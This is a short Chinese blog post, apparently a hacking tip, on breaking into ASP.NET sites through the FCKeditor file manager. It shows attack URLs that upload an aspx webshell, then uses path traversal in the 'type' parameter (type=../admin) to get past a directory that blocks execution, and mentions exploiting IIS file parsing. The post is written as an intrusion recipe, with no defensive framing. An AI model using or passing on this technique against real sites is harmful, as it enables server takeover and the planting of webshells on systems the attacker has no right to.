- A+
显示不全请点击全屏阅读
例如这样一个站
http://www.xxxxxx.com/admin/fckeditor/editor/filemanager/browser/default/browser.html?type=monyer&connector=connectors/aspx/connector.aspx
可以直接上传aspx的大马
但是当你查看路径去尝试运行的时候却发现出不来
This Virtual Directory does not allow objects to be executed.此虚拟目录不允许执行的对象。
再看另一个上传
http://www.xxxxxx.com/admin/fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/aspx/connector.aspx
看了一下 可以发现
一个是 type=monyer
另一个是 type=image
把type=修改 type=../admin
怎么样
http://www.xxxxx.com/admin/fckeditor/editor/filemanager/browser/default/browser.html?type=../admin&connector=connectors/aspx/connector.aspx
没想到爆文件了 直接上传
大家看一下 可以利用 iis解析嘛
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡